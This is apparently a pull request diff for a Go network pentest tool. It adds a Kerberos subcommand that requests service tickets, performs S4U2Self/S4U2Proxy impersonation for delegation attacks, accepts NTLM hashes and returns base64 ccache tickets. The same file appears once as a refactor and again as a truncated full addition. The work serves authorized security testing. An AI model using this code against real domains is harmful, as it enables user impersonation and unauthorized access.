### PR TITLE
Kerberos Service Ticket + S4U Tool

### DIFF
--- a/cmd/pentest.go
+++ b/cmd/pentest.go
@@ -6,6 +6,7 @@ import (
 
 	// Generated
 	pentestfern "github.com/Method-Security/networkscan/generated/go/pentest"
+	kerberosfern "github.com/Method-Security/networkscan/generated/go/pentest/kerberos"
 	ldapfern "github.com/Method-Security/networkscan/generated/go/pentest/ldap"
 	smbfern "github.com/Method-Security/networkscan/generated/go/pentest/smb"
 	sshfern "github.com/Method-Security/networkscan/generated/go/pentest/ssh"
@@ -224,6 +225,7 @@ func (a *NetworkScan) createServiceCommands(parent *cobra.Command) {
 	a.createSSHPentestCommand(serviceCmd)
 	a.createTelnetPentestCommand(serviceCmd)
 	a.createLDAPPentestCommand(serviceCmd)
+	a.createKerberosPentestCommand(serviceCmd)
 
 	parent.AddCommand(serviceCmd)
 }
@@ -396,6 +398,42 @@ Additional actions can be specified to layer more functionality on top.`,
 	ldapCmd.Flags().Bool("minimal-queries", false, "Use minimal query sets and essential attributes only")
 
 	parent.AddCommand(ldapCmd)
+}
+
+// createKerberosPentestCommand creates the Kerberos pentest subcommand
+func (a *NetworkScan) createKerberosPentestCommand(parent *cobra.Command) {
+	kerberosCmd := &cobra.Command{
+		Use:   "kerberos",
+		Short: "Perform pentest operations against Kerberos services",
+		Long: `Perform pentest operations against Kerberos services.
+
+Supports advanced Kerberos attacks such as constrained delegation.`,
+		Run: func(cmd *cobra.Command, args []string) {
+			a.runKerberosPentest(cmd, args)
+		},
+	}
+
+	// Target configuration
+	kerberosCmd.Flags().StringSlice("targets", []string{}, "Target domain controllers (DC.domain.com:88)")
+	_ = kerberosCmd.MarkFlagRequired("targets")
+
+	// Action flags
+	kerberosCmd.Flags().StringSlice("actions", []string{}, "Actions to perform: SERVICE_TICKET")
+
+	// Authentication flags
+	kerberosCmd.Flags().StringSliceP("usernames", "u", []string{}, "Username for authentication")
+	kerberosCmd.Flags().StringSliceP("passwords", "p", []string{}, "Password for user")
+	kerberosCmd.Flags().String("ntlm-hash", "", "NTLM hash for user authentication")
+	kerberosCmd.Flags().StringP("domain", "d", "", "Domain name")
+
+	// Service ticket specific flags
+	kerberosCmd.Flags().String("spn", "", "Target Service Principal Name (e.g., HTTP/server.domain.com)")
+	kerberosCmd.Flags().String("impersonate", "", "Target user to impersonate (optional, for delegation attacks)")
+
+	// Behavior flags
+	kerberosCmd.Flags().Int("timeout", 5000, "Connection timeout in milliseconds")
+
+	parent.AddCommand(kerberosCmd)
 }
 
 // runSMBPentest executes SMB pentest operations
@@ -1174,5 +1212,107 @@ func getLDAPPentestConfig(targets []string, actions []ldapfern.PentestLdapAction
 		StopFirstSuccess: &stopFirstSuccess,
 		SuccessfulOnly:   &successfulOnly,
 		DomaindumpConfig: domainDumpConfig,
+	}
+}
+
+// runKerberosPentest executes Kerberos pentest operations
+func (a *NetworkScan) runKerberosPentest(cmd *cobra.Command, args []string) {
+	// Get targets from flag
+	targets, _ := cmd.Flags().GetStringSlice("targets")
+	if len(targets) == 0 {
+		a.OutputSignal.AddError(fmt.Errorf("no targets specified"))
+		return
+	}
+
+	// Get actions from flag
+	actions, err := cmd.Flags().GetStringSlice("actions")
+	if err != nil {
+		a.OutputSignal.AddError(err)
+		return
+	}
+
+	// Convert string actions to enum
+	var kerberosActions []kerberosfern.PentestKerberosAction
+	for _, actionStr := range actions {
+		switch strings.ToUpper(actionStr) {
+		case "SERVICE_TICKET":
+			kerberosActions = append(kerberosActions, kerberosfern.PentestKerberosActionServiceTicket)
+		default:
+			a.OutputSignal.AddError(fmt.Errorf("unsupported Kerberos action: %s", actionStr))
+			return
+		}
+	}
+
+	// Build configuration
+	config := a.buildKerberosConfig(cmd, targets, kerberosActions)
+
+	// Create engine and execute
+	engine := pentest_internal.NewEngine()
+	report, err := engine.RunKerberosPentest(cmd.Context(), config)
+	if err != nil {
+		a.OutputSignal.AddError(err)
+		return
+	}
+
+	// Use the report directly since it already has the consolidated structure
+	a.OutputSignal.Content = report
+}
+
+// buildKerberosConfig builds the Kerberos configuration from CLI flags
+func (a *NetworkScan) buildKerberosConfig(cmd *cobra.Command, targets []string, actions []kerberosfern.PentestKerberosAction) *kerberosfern.PentestKerberosConfig {
+	// Get authentication flags
+	usernames, _ := cmd.Flags().GetStringSlice("usernames")
+	passwords, _ := cmd.Flags().GetStringSlice("passwords")
+	domain, _ := cmd.Flags().GetString("domain")
+	ntlmHash, _ := cmd.Flags().GetString("ntlm-hash")
+	timeout, _ := cmd.Flags().GetInt("timeout")
+
+	// Get service ticket specific flags
+	spn, _ := cmd.Flags().GetString("spn")
+	impersonate, _ := cmd.Flags().GetString("impersonate")
+
+	// Handle optional string pointers
+	var domainPtr *string
+	if domain != "" {
+		domainPtr = &domain
+	}
+
+	var ntlmHashPtr *string
+	if ntlmHash != "" {
+		ntlmHashPtr = &ntlmHash
+	}
+
+	// Create service ticket config if action is requested
+	var serviceTicketConfig *kerberosfern.PentestKerberosServiceTicketConfig
+	for _, action := range actions {
+		if action == kerberosfern.PentestKerberosActionServiceTicket {
+			// Handle optional impersonate field
+			var impersonatePtr *string
+			if impersonate != "" {
+				impersonatePtr = &impersonate
+			}
+			serviceTicketConfig = &kerberosfern.PentestKerberosServiceTicketConfig{
+				Targets:     targets,
+				Usernames:   usernames,
+				Passwords:   passwords,
+				Domain:      domainPtr,
+				NtlmHash:    ntlmHashPtr,
+				Timeout:     timeout,
+				Spn:         spn,
+				Impersonate: impersonatePtr,
+			}
+			break
+		}
+	}
+
+	return &kerberosfern.PentestKerberosConfig{
+		Targets:             targets,
+		Actions:             actions,
+		Usernames:           usernames,
+		Passwords:           passwords,
+		Domain:              domainPtr,
+		NtlmHash:            ntlmHashPtr,
+		Timeout:             timeout,
+		ServiceTicketConfig: serviceTicketConfig,
 	}
 }

--- a/fern/definition/pentest/kerberos/kerberos.yml
+++ b/fern/definition/pentest/kerberos/kerberos.yml
@@ -1,0 +1,34 @@
+imports:
+  common: ../common.yml
+  serviceticket: ./serviceticket.yml
+
+types:
+  # Kerberos Actions
+  PentestKerberosAction:
+    enum:
+      - SERVICE_TICKET # Request service ticket (supports regular requests, traditional CD, and RBCD via impersonation)
+
+  # Kerberos Result Types - union of all action results
+  PentestKerberosResult:
+    union:
+      ServiceTicketResult: serviceticket.PentestKerberosServiceTicketResult
+
+  # Container for Kerberos results
+  PentestKerberosResultContainer:
+    properties:
+      result: optional<PentestKerberosResult>
+
+  # Config for Kerberos pentest operations - extends general config
+  PentestKerberosConfig:
+    extends: common.PentestGeneralConfig
+    properties:
+      actions: list<PentestKerberosAction>
+      # Action-specific configurations - union based on actions requested
+      serviceTicketConfig: optional<serviceticket.PentestKerberosServiceTicketConfig>
+
+  # Final report structure
+  PentestKerberosReport:
+    properties:
+      config: PentestKerberosConfig
+      result: optional<PentestKerberosResultContainer>
+      errors: optional<list<string>>

--- a/fern/definition/pentest/kerberos/serviceticket.yml
+++ b/fern/definition/pentest/kerberos/serviceticket.yml
@@ -1,0 +1,31 @@
+imports:
+  common: ../common.yml
+
+types:
+  # Kerberos Service Ticket request configuration
+  # Supports regular ST requests, traditional constrained delegation, and resource-based constrained delegation
+  PentestKerberosServiceTicketConfig:
+    extends: common.PentestGeneralConfig
+    properties:
+      spn: string # Target Service Principal Name (e.g., "HTTP/server.domain.com")
+      impersonate: optional<string> # Username to impersonate (for delegation attacks, optional for regular ST requests)
+
+  # Result containing the acquired service ticket details
+  PentestKerberosServiceTicketResult:
+    properties:
+      target: string # Target host:port
+      spn: string # Service Principal Name used
+      impersonateUser: optional<string> # User being impersonated (if any)
+      requestingUser: string # User requesting the service ticket (from auth config)
+      ticketAcquired: boolean # Whether service ticket was successfully acquired
+      ticketBase64: optional<string> # Base64-encoded ccache ticket data
+      message: string # Result message or error details
+      timestamp: datetime # When the operation was performed
+      errors: optional<list<string>> # Any errors encountered
+
+  # Final report structure for Kerberos Service Ticket
+  PentestKerberosServiceTicketReport:
+    properties:
+      config: PentestKerberosServiceTicketConfig
+      result: optional<PentestKerberosServiceTicketResult>
+      errors: optional<list<string>>

--- a/go.mod
+++ b/go.mod
@@ -73,7 +73,7 @@ require (
 	github.com/google/go-querystring v1.1.0 // indirect
 	github.com/gorilla/css v1.0.1 // indirect
 	github.com/inconshreveable/mousetrap v1.1.0 // indirect
-	github.com/jfjallid/gofork v1.7.6 // indirect
+	github.com/jfjallid/gofork v1.7.6
 	github.com/jfjallid/golog v0.3.4 // indirect
 	github.com/jfjallid/mstypes v0.0.1 // indirect
 	github.com/jfjallid/ndr v0.0.1 // indirect

--- a/internal/common/ntlm/hash.go
+++ b/internal/common/ntlm/hash.go
@@ -20,8 +20,8 @@ func NewHashProcessor() *HashProcessor {
 	return &HashProcessor{}
 }
 
-// ProcessHashForSMB processes an NTLM hash for SMB authentication (returns only NT portion as bytes)
-func (p *HashProcessor) ProcessHashForSMB(ntlmHash string) ([]byte, error) {
+// ParseNTLMHash parses an NTLM hash and returns the NT portion as bytes
+func (p *HashProcessor) ParseNTLMHash(ntlmHash string) ([]byte, error) {
 	if len(ntlmHash) == 32 {
 		// Only NT hash provided (32 hex chars), use directly
 		return hex.DecodeString(ntlmHash)

--- a/internal/pentest/engine.go
+++ b/internal/pentest/engine.go
@@ -8,11 +8,13 @@ import (
 	"time"
 
 	pentestfern "github.com/Method-Security/networkscan/generated/go/pentest"
+	kerberosfern "github.com/Method-Security/networkscan/generated/go/pentest/kerberos"
 	ldapfern "github.com/Method-Security/networkscan/generated/go/pentest/ldap"
 	smbfern "github.com/Method-Security/networkscan/generated/go/pentest/smb"
 	sshfern "github.com/Method-Security/networkscan/generated/go/pentest/ssh"
 	telnetfern "github.com/Method-Security/networkscan/generated/go/pentest/telnet"
 	"github.com/Method-Security/networkscan/internal/common/ntlm"
+	kerberospentest "github.com/Method-Security/networkscan/internal/pentest/kerberos"
 	ldappentest "github.com/Method-Security/networkscan/internal/pentest/ldap"
 	smbpentest "github.com/Method-Security/networkscan/internal/pentest/smb"
 	sshpentest "github.com/Method-Security/networkscan/internal/pentest/ssh"
@@ -844,6 +846,52 @@ func (e *Engine) executeLDAPActionsWithAuthenticatedConnection(ctx context.Conte
 	}
 
 	return results, errors
+}
+
+// RunKerberosPentest performs Kerberos pentest operations
+func (e *Engine) RunKerberosPentest(ctx context.Context, config *kerberosfern.PentestKerberosConfig) (*kerberosfern.PentestKerberosReport, error) {
+	log := svc1log.FromContext(ctx)
+
+	// Create single consolidated report with list of results
+	var allErrors []string
+	var result *kerberosfern.PentestKerberosResult
+
+	// Process each action requested
+	for _, action := range config.Actions {
+		switch action {
+		case kerberosfern.PentestKerberosActionServiceTicket:
+			if config.ServiceTicketConfig == nil {
+				allErrors = append(allErrors, "Service ticket action requested but no configuration provided")
+				continue
+			}
+
+			log.Info("Performing Kerberos service ticket request")
+			serviceTicketResult, err := kerberospentest.RequestServiceTicket(ctx, config.ServiceTicketConfig)
+			if err != nil {
+				allErrors = append(allErrors, fmt.Sprintf("Service ticket request failed: %v", err))
+				continue
+			}
+
+			result = kerberosfern.NewPentestKerberosResultFromServiceTicketResult(serviceTicketResult)
+
+		default:
+			allErrors = append(allErrors, fmt.Sprintf("unsupported Kerberos action: %s", string(action)))
+		}
+	}
+
+	// Return consolidated report
+	var resultContainer *kerberosfern.PentestKerberosResultContainer
+	if result != nil {
+		resultContainer = &kerberosfern.PentestKerberosResultContainer{
+			Result: result,
+		}
+	}
+
+	return &kerberosfern.PentestKerberosReport{
+		Config: config,
+		Result: resultContainer,
+		Errors: allErrors,
+	}, nil
 }
 
 // Helper functions have been moved to utils package

--- a/internal/pentest/kerberos/serviceticket.go
+++ b/internal/pentest/kerberos/serviceticket.go
@@ -1,30 +1,14 @@
 package kerberos
 
 import (
-	"bytes"
 	"context"
-	"encoding/base64"
-	"encoding/binary"
 	"fmt"
 	"strings"
 	"time"
 
 	kerberosfern "github.com/Method-Security/networkscan/generated/go/pentest/kerberos"
-	"github.com/Method-Security/networkscan/internal/common/ntlm"
-	"github.com/jfjallid/gofork/encoding/asn1"
-	"github.com/jfjallid/gokrb5/v8/client"
-	"github.com/jfjallid/gokrb5/v8/config"
-	"github.com/jfjallid/gokrb5/v8/credentials"
-	"github.com/jfjallid/gokrb5/v8/crypto"
-	"github.com/jfjallid/gokrb5/v8/iana/chksumtype"
-	"github.com/jfjallid/gokrb5/v8/iana/etypeID"
-	"github.com/jfjallid/gokrb5/v8/iana/flags"
-	"github.com/jfjallid/gokrb5/v8/iana/keyusage"
-	"github.com/jfjallid/gokrb5/v8/iana/nametype"
-	"github.com/jfjallid/gokrb5/v8/iana/patype"
-	"github.com/jfjallid/gokrb5/v8/messages"
-	"github.com/jfjallid/gokrb5/v8/types"
-	svc1log "github.com/palantir/witchcraft-go-logging/wlog/svclog/svc1log"
+	"github.com/Method-Security/networkscan/internal/protocol/kerberos"
+	"github.com/palantir/witchcraft-go-logging/wlog/svclog/svc1log"
 )
 
 // RequestServiceTicket requests a Kerberos service ticket (supports regular requests, traditional CD, and RBCD)
@@ -32,7 +16,7 @@ func RequestServiceTicket(ctx context.Context, pentestConfig *kerberosfern.Pente
 	log := svc1log.FromContext(ctx)
 
 	// Parse the target to extract host and port information
-	target, err := ParseTarget(pentestConfig.Targets[0])
+	target, err := kerberos.ParseTarget(pentestConfig.Targets[0])
 	if err != nil {
 		return nil, fmt.Errorf("failed to parse target: %v", err)
 	}
@@ -47,99 +31,33 @@ func RequestServiceTicket(ctx context.Context, pentestConfig *kerberosfern.Pente
 		svc1log.SafeParam("spn", pentestConfig.Spn),
 		svc1log.SafeParam("impersonate", pentestConfig.Impersonate))
 
-	// Parse SPN to extract service components
-	spnParts := strings.Split(pentestConfig.Spn, "/")
-	if len(spnParts) != 2 {
+	// Validate SPN format
+	if err := validateSPN(pentestConfig.Spn); err != nil {
 		return &kerberosfern.PentestKerberosServiceTicketResult{
 			Target:          pentestConfig.Targets[0],
 			Spn:             pentestConfig.Spn,
 			ImpersonateUser: pentestConfig.Impersonate,
 			RequestingUser:  "",
 			TicketAcquired:  false,
-			Message:         "Invalid SPN format. Expected: service/hostname.domain.com",
+			Message:         err.Error(),
 			Timestamp:       time.Now(),
 		}, nil
 	}
 
-	// serviceName := spnParts[0]  // Not currently used
-	// serviceHostFQDN := spnParts[1]  // Not currently used
-
-	// Extract service domain from FQDN - not currently used
-	// serviceDomainParts := strings.SplitN(serviceHostFQDN, ".", 2)
-	// var serviceDomain string
-	// if len(serviceDomainParts) > 1 {
-	//	serviceDomain = serviceDomainParts[1]
-	// }
-
-	// Create Kerberos configuration (match kerbtool behavior)
-	cfg := config.New()
-	cfg.LibDefaults.DNSLookupKDC = false // Disable DNS lookup since we're specifying KDC directly
-	cfg.LibDefaults.DefaultRealm = strings.ToUpper(target.Domain)
-	cfg.Realms = []config.Realm{
-		{
-			Realm: strings.ToUpper(target.Domain),
-			KDC:   []string{fmt.Sprintf("%s:%d", target.Host, target.Port)},
-		},
-	}
-	cfg.DomainRealm = map[string]string{
-		fmt.Sprintf(".%s", strings.ToLower(target.Domain)): strings.ToUpper(target.Domain),
-	}
-	cfg.LibDefaults.Forwardable = true
-
-	// Set ticket lifetimes
-	ticketDuration := time.Hour * 10
-	cfg.LibDefaults.RenewLifetime = ticketDuration
-	cfg.LibDefaults.TicketLifetime = ticketDuration
-
-	// Set up encryption preferences (match kerbtool behavior)
-	cfg.LibDefaults.DefaultTGSEnctypeIDs = []int32{etypeID.AES256_CTS_HMAC_SHA1_96, etypeID.AES128_CTS_HMAC_SHA1_96, etypeID.RC4_HMAC}
-	cfg.LibDefaults.DefaultTktEnctypeIDs = []int32{etypeID.AES256_CTS_HMAC_SHA1_96, etypeID.AES128_CTS_HMAC_SHA1_96, etypeID.RC4_HMAC}
-
-	// Unset RenewableOK flag (match kerbtool behavior)
-	types.UnsetFlag(&cfg.LibDefaults.KDCDefaultOptions, flags.RenewableOK)
+	// Create Kerberos client manager
+	clientManager := kerberos.NewClientManager(target)
+	cfg := clientManager.CreateConfiguration()
 
 	// Set up client with appropriate credentials from unified auth config
-	var krb5Client *client.Client
-	var requestingUser string
-
-	// Create client settings
-	settings := []func(*client.Settings){client.DisablePAFXFAST(true)}
-
-	// Use first available credential method from unified auth config
-	if len(pentestConfig.Usernames) > 0 {
-		requestingUser = pentestConfig.Usernames[0]
-		var password string
-		if len(pentestConfig.Passwords) > 0 {
-			password = pentestConfig.Passwords[0]
-		}
-
-		// Check if NTLM hash is provided
-		if pentestConfig.NtlmHash != nil && *pentestConfig.NtlmHash != "" {
-			hashProcessor := ntlm.NewHashProcessor()
-			hashBytes, hashErr := hashProcessor.ParseNTLMHash(*pentestConfig.NtlmHash)
-			if hashErr != nil {
-				return &kerberosfern.PentestKerberosServiceTicketResult{
-					Target:          pentestConfig.Targets[0],
-					Spn:             pentestConfig.Spn,
-					ImpersonateUser: pentestConfig.Impersonate,
-					RequestingUser:  requestingUser,
-					TicketAcquired:  false,
-					Message:         fmt.Sprintf("Invalid NTLM hash: %v", hashErr),
-					Timestamp:       time.Now(),
-				}, nil
-			}
-			krb5Client = client.NewWithHash(requestingUser, strings.ToUpper(target.Domain), hashBytes, cfg, settings...)
-		} else {
-			krb5Client = client.NewWithPassword(requestingUser, strings.ToUpper(target.Domain), password, cfg, settings...)
-		}
-	} else {
+	krb5Client, requestingUser, err := clientManager.CreateClientFromConfig(pentestConfig)
+	if err != nil {
 		return &kerberosfern.PentestKerberosServiceTicketResult{
 			Target:          pentestConfig.Targets[0],
 			Spn:             pentestConfig.Spn,
 			ImpersonateUser: pentestConfig.Impersonate,
 			RequestingUser:  "",
 			TicketAcquired:  false,
-			Message:         "No username provided in auth config",
+			Message:         err.Error(),
 			Timestamp:       time.Now(),
 		}, nil
 	}
@@ -165,7 +83,9 @@ func RequestServiceTicket(ctx context.Context, pentestConfig *kerberosfern.Pente
 	if pentestConfig.Impersonate != nil {
 		impersonateUser = *pentestConfig.Impersonate
 	}
-	ticketBase64, err := performServiceTicketRequest(ctx, krb5Client, cfg, requestingUser, target.Domain, impersonateUser, pentestConfig.Spn)
+
+	ticketManager := kerberos.NewTicketManager(krb5Client, cfg)
+	ticketBase64, err := ticketManager.RequestServiceTicket(ctx, requestingUser, target.Domain, impersonateUser, pentestConfig.Spn)
 	if err != nil {
 		return &kerberosfern.PentestKerberosServiceTicketResult{
 			Target:          pentestConfig.Targets[0],
@@ -192,249 +112,11 @@ func RequestServiceTicket(ctx context.Context, pentestConfig *kerberosfern.Pente
 	}, nil
 }
 
-// performServiceTicketRequest performs service ticket acquisition (with optional S4U2Self and S4U2Proxy for impersonation)
-func performServiceTicketRequest(ctx context.Context, krb5Client *client.Client, cfg *config.Config, requestingUser, userDomain, impersonateUser, spn string) (string, error) {
-	log := svc1log.FromContext(ctx)
-
-	// Step 1: Get TGT for delegation user
-	tgt, sessionKey, err := krb5Client.GetTGT(strings.ToUpper(userDomain))
-	if err != nil {
-		return "", fmt.Errorf("failed to get TGT: %v", err)
+// validateSPN validates the format of a Service Principal Name
+func validateSPN(spn string) error {
+	spnParts := strings.Split(spn, "/")
+	if len(spnParts) != 2 {
+		return fmt.Errorf("invalid SPN format. Expected: service/hostname.domain.com")
 	}
-
-	log.Debug("Successfully obtained TGT for requesting user")
-
-	if impersonateUser != "" {
-		// Step 2: Perform S4U2Self to get service ticket for impersonated user
-		s4u2SelfTicket, err := performS4U2Self(krb5Client, cfg, requestingUser, userDomain, impersonateUser, tgt, sessionKey)
-		if err != nil {
-			return "", fmt.Errorf("S4U2Self failed: %v", err)
-		}
-
-		log.Debug("Successfully performed S4U2Self")
-
-		// Step 3: Perform S4U2Proxy to get service ticket for target SPN
-		err = performS4U2Proxy(krb5Client, cfg, requestingUser, userDomain, impersonateUser, tgt, s4u2SelfTicket, sessionKey, spn)
-		if err != nil {
-			return "", fmt.Errorf("S4U2Proxy failed: %v", err)
-		}
-
-		log.Debug("Successfully performed S4U2Proxy")
-	} else {
-		// Regular service ticket request without impersonation
-		_, _, err := krb5Client.GetServiceTicket(spn)
-		if err != nil {
-			return "", fmt.Errorf("failed to get service ticket: %v", err)
-		}
-
-		log.Debug("Successfully obtained service ticket")
-	}
-
-	// Step 4: Generate base64 encoded ccache
-	var ticketPrincipal string
-	if impersonateUser != "" {
-		ticketPrincipal = impersonateUser
-	} else {
-		ticketPrincipal = requestingUser
-	}
-	ticketBase64, err := generateTicketBase64(krb5Client, ticketPrincipal, strings.ToUpper(userDomain), spn)
-	if err != nil {
-		return "", fmt.Errorf("failed to generate ticket: %v", err)
-	}
-
-	return ticketBase64, nil
-}
-
-// performS4U2Self performs S4U2Self to get a service ticket for the impersonated user
-func performS4U2Self(krb5Client *client.Client, cfg *config.Config, requestingUser, userDomain, impersonateUser string, tgt messages.Ticket, sessionKey types.EncryptionKey) (messages.Ticket, error) {
-	// Create authenticator
-	auth, err := types.NewAuthenticator(strings.ToUpper(userDomain), types.NewPrincipalName(nametype.KRB_NT_PRINCIPAL, requestingUser))
-	if err != nil {
-		return messages.Ticket{}, fmt.Errorf("failed to create authenticator: %v", err)
-	}
-
-	// Create AP-REQ
-	apReq, err := messages.NewAPReq(tgt, sessionKey, auth)
-	if err != nil {
-		return messages.Ticket{}, fmt.Errorf("failed to create AP-REQ: %v", err)
-	}
-
-	apReqBytes, err := apReq.Marshal()
-	if err != nil {
-		return messages.Ticket{}, fmt.Errorf("failed to marshal AP-REQ: %v", err)
-	}
-
-	// Create TGS-REQ for S4U2Self
-	tgsReq, err := messages.NewS4UTGSReq(
-		types.NewPrincipalName(nametype.KRB_NT_PRINCIPAL, impersonateUser),
-		types.NewPrincipalName(nametype.KRB_NT_UNKNOWN, requestingUser),
-		tgt.Realm,
-		cfg,
-	)
-	if err != nil {
-		return messages.Ticket{}, fmt.Errorf("failed to create S4U TGS-REQ: %v", err)
-	}
-
-	// Add PA-TGS-REQ
-	tgsReq.PAData = types.PADataSequence{
-		types.PAData{
-			PADataType:  patype.PA_TGS_REQ,
-			PADataValue: apReqBytes,
-		},
-	}
-
-	// Create PA-FOR-USER (match kerbtool approach)
-	s4uByteArray := bytes.NewBuffer([]byte{})
-	if err := binary.Write(s4uByteArray, binary.LittleEndian, nametype.KRB_NT_PRINCIPAL); err != nil {
-		return messages.Ticket{}, fmt.Errorf("failed to write name type: %v", err)
-	}
-	if err := binary.Write(s4uByteArray, binary.LittleEndian, []byte(impersonateUser+userDomain+"Kerberos")); err != nil {
-		return messages.Ticket{}, fmt.Errorf("failed to write PA-FOR-USER data: %v", err)
-	}
-
-	checksumEtype, _ := crypto.GetChksumEtype(chksumtype.KERB_CHECKSUM_HMAC_MD5)
-	cksumHash, err := checksumEtype.GetChecksumHash(sessionKey.KeyValue, s4uByteArray.Bytes(), keyusage.KERB_NON_KERB_CKSUM_SALT)
-	if err != nil {
-		return messages.Ticket{}, fmt.Errorf("failed to calculate checksum: %v", err)
-	}
-
-	impersonatedPrinc := types.NewPrincipalName(nametype.KRB_NT_PRINCIPAL, impersonateUser)
-	paForUser := types.PAForUser{
-		UserName:  impersonatedPrinc,
-		UserRealm: userDomain,
-		Chksum: types.Checksum{
-			CksumType: checksumEtype.GetHashID(),
-			Checksum:  cksumHash,
-		},
-		AuthPackage: "Kerberos",
-	}
-
-	paForUserBuf, err := asn1.Marshal(paForUser)
-	if err != nil {
-		return messages.Ticket{}, fmt.Errorf("failed to marshal PA-FOR-USER: %v", err)
-	}
-
-	// Set required flags
-	types.SetFlag(&tgsReq.ReqBody.KDCOptions, flags.Forwardable)
-	types.SetFlag(&tgsReq.ReqBody.KDCOptions, flags.Renewable)
-	types.SetFlag(&tgsReq.ReqBody.KDCOptions, flags.Canonicalize)
-
-	// Add RC4 support (required for S4U)
-	foundRC4 := false
-	for _, etype := range tgsReq.ReqBody.EType {
-		if etype == etypeID.RC4_HMAC {
-			foundRC4 = true
-			break
-		}
-	}
-	if !foundRC4 {
-		tgsReq.ReqBody.EType = append(tgsReq.ReqBody.EType, etypeID.RC4_HMAC)
-	}
-
-	// Add PA-FOR-USER to PA data
-	tgsReq.PAData = append(tgsReq.PAData, types.PAData{
-		PADataType:  patype.PA_FOR_USER,
-		PADataValue: paForUserBuf,
-	})
-
-	// Perform TGS exchange
-	_, tgsRep, err := krb5Client.TGSExchange(tgsReq, strings.ToUpper(userDomain), tgt, sessionKey, 0)
-	if err != nil {
-		return messages.Ticket{}, fmt.Errorf("TGS exchange failed: %v", err)
-	}
-
-	return tgsRep.Ticket, nil
-}
-
-// performS4U2Proxy performs S4U2Proxy to get a service ticket for the target SPN
-func performS4U2Proxy(krb5Client *client.Client, cfg *config.Config, requestingUser, userDomain, impersonateUser string, tgt, s4u2SelfTicket messages.Ticket, sessionKey types.EncryptionKey, spn string) error {
-	// Create authenticator
-	auth, err := types.NewAuthenticator(strings.ToUpper(userDomain), types.NewPrincipalName(nametype.KRB_NT_PRINCIPAL, requestingUser))
-	if err != nil {
-		return fmt.Errorf("failed to create authenticator: %v", err)
-	}
-
-	// Create AP-REQ
-	apReq, err := messages.NewAPReq(tgt, sessionKey, auth)
-	if err != nil {
-		return fmt.Errorf("failed to create AP-REQ: %v", err)
-	}
-
-	apReqBytes, err := apReq.Marshal()
-	if err != nil {
-		return fmt.Errorf("failed to marshal AP-REQ: %v", err)
-	}
-
-	// Create TGS-REQ for S4U2Proxy
-	tgsReq, err := messages.NewS4UTGSReq(
-		types.NewPrincipalName(nametype.KRB_NT_PRINCIPAL, impersonateUser),
-		types.NewPrincipalName(nametype.KRB_NT_SRV_INST, spn),
-		tgt.Realm,
-		cfg,
-	)
-	if err != nil {
-		return fmt.Errorf("failed to create S4U TGS-REQ: %v", err)
-	}
-
-	// Add PA-TGS-REQ
-	tgsReq.PAData = types.PADataSequence{
-		types.PAData{
-			PADataType:  patype.PA_TGS_REQ,
-			PADataValue: apReqBytes,
-		},
-	}
-
-	// Add PA-PAC-OPTIONS for resource-based constrained delegation
-	paPacOptBytes, err := types.GetPAPacOptionsAsnMarshalled([]int{3}) // resource-based-constrained-delegation
-	if err != nil {
-		return fmt.Errorf("failed to create PA-PAC-OPTIONS: %v", err)
-	}
-
-	tgsReq.PAData = append(tgsReq.PAData, types.PAData{
-		PADataType:  patype.PA_PAC_OPTIONS,
-		PADataValue: paPacOptBytes,
-	})
-
-	// Set additional ticket (S4U2Self result)
-	tgsReq.ReqBody.AdditionalTickets = append(tgsReq.ReqBody.AdditionalTickets, s4u2SelfTicket)
-
-	// Set required flags
-	opts := types.NewKrbFlags()
-	types.SetFlags(&opts, []int{flags.Canonicalize, flags.Forwardable, flags.Renewable, flags.CnameInAddlTkt})
-	tgsReq.KDCReqFields.ReqBody.KDCOptions = opts
-
-	// Perform TGS exchange
-	_, _, err = krb5Client.TGSExchange(tgsReq, tgt.Realm, tgt, sessionKey, 0)
-	if err != nil {
-		return fmt.Errorf("TGS exchange failed: %v", err)
-	}
-
 	return nil
-}
-
-// generateTicketBase64 generates the acquired ticket as a base64-encoded ccache
-func generateTicketBase64(krb5Client *client.Client, impersonateUser, userDomain, spn string) (string, error) {
-	// Create ccache
-	cache := credentials.NewV4CCache()
-	clientPrincipal := types.NewPrincipalName(nametype.KRB_NT_PRINCIPAL, impersonateUser)
-	principal := credentials.NewPrincipal(clientPrincipal, userDomain)
-	cache.SetDefaultPrincipal(principal)
-	cache.SetKDCTimeOffset(0xFFFFFFFF, 0)
-
-	// Save the service ticket
-	err := krb5Client.SaveSPNToCCache(cache, clientPrincipal, userDomain, spn, "")
-	if err != nil {
-		return "", fmt.Errorf("failed to save SPN to ccache: %v", err)
-	}
-
-	// Marshal ccache to bytes
-	cacheBytes, err := cache.Marshal()
-	if err != nil {
-		return "", fmt.Errorf("failed to marshal ccache: %v", err)
-	}
-
-	// Encode as base64
-	ticketBase64 := base64.StdEncoding.EncodeToString(cacheBytes)
-
-	return ticketBase64, nil
 }

--- a/internal/pentest/kerberos/serviceticket.go
+++ b/internal/pentest/kerberos/serviceticket.go
@@ -1,0 +1,440 @@
+package kerberos
+
+import (
+	"bytes"
+	"context"
+	"encoding/base64"
+	"encoding/binary"
+	"fmt"
+	"strings"
+	"time"
+
+	kerberosfern "github.com/Method-Security/networkscan/generated/go/pentest/kerberos"
+	"github.com/Method-Security/networkscan/internal/common/ntlm"
+	"github.com/jfjallid/gofork/encoding/asn1"
+	"github.com/jfjallid/gokrb5/v8/client"
+	"github.com/jfjallid/gokrb5/v8/config"
+	"github.com/jfjallid/gokrb5/v8/credentials"
+	"github.com/jfjallid/gokrb5/v8/crypto"
+	"github.com/jfjallid/gokrb5/v8/iana/chksumtype"
+	"github.com/jfjallid/gokrb5/v8/iana/etypeID"
+	"github.com/jfjallid/gokrb5/v8/iana/flags"
+	"github.com/jfjallid/gokrb5/v8/iana/keyusage"
+	"github.com/jfjallid/gokrb5/v8/iana/nametype"
+	"github.com/jfjallid/gokrb5/v8/iana/patype"
+	"github.com/jfjallid/gokrb5/v8/messages"
+	"github.com/jfjallid/gokrb5/v8/types"
+	svc1log "github.com/palantir/witchcraft-go-logging/wlog/svclog/svc1log"
+)
+
+// RequestServiceTicket requests a Kerberos service ticket (supports regular requests, traditional CD, and RBCD)
+func RequestServiceTicket(ctx context.Context, pentestConfig *kerberosfern.PentestKerberosServiceTicketConfig) (*kerberosfern.PentestKerberosServiceTicketResult, error) {
+	log := svc1log.FromContext(ctx)
+
+	// Parse the target to extract host and port information
+	target, err := ParseTarget(pentestConfig.Targets[0])
+	if err != nil {
+		return nil, fmt.Errorf("failed to parse target: %v", err)
+	}
+
+	// Use the domain from the configuration instead of trying to extract from target
+	if pentestConfig.Domain != nil && *pentestConfig.Domain != "" {
